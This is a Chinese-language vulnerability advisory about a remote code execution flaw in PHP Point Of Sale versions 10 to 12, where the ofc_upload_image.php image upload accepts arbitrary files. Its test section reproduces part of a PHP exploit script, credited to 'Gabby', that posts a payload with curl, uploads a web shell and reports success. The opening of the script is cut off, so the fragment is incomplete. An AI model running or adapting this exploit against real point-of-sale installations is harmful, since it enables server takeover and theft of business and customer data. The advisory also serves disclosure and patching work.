PHP Point Of Sale ‘ofc_upload_image.php’远程代码执行漏洞

漏洞起因
输入验证错误
危险等级

影响系统
PHP Point Of Sale 10.x
PHP Point Of Sale 11.x
PHP Point Of Sale 12.x

不受影响系统

危害
远程攻击者可以利用漏洞以WEB权限执行任意PHP代码。
CVSSv2:

攻击所需条件
攻击者必须访问PHP Point Of Sale。

漏洞信息
PHP Point Of Sale是一款Web的销售系统,适合帮助小型企业跟踪客户、订单和销售。
PHP Point Of Sale不正确处理图像上传,允许远程攻击者利用漏洞上传任意文件并以WEB权限执行。

测试方法
‘;
$headers = array(‘User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1’,
‘Content-Type: text/plain’);
echo “=============================================== \n”;
echo “: Simple Exploiter Point Of Sale by Gabby :\n”;
echo “=============================================== \n\n”;
echo “[+] Upload Shell ke : {$options[‘t’]}\n”;
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $target);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, ‘Undefined variable: HTTP_RAW_POST_DATA’) && @fopen($shell, ‘r’))
{
echo “[+] Exploit Sukses,.. :D\n”;
echo “[+] {$shell}\n”;
}
else
{
die(“[-] Exploit Gagal,.. :(\n”);
}

?>
安全建议

厂商解决方案
目前没有详细解决方案提供:
https://www.phppointofsale.com/?

漏洞提供者
Gabby

评论关闭。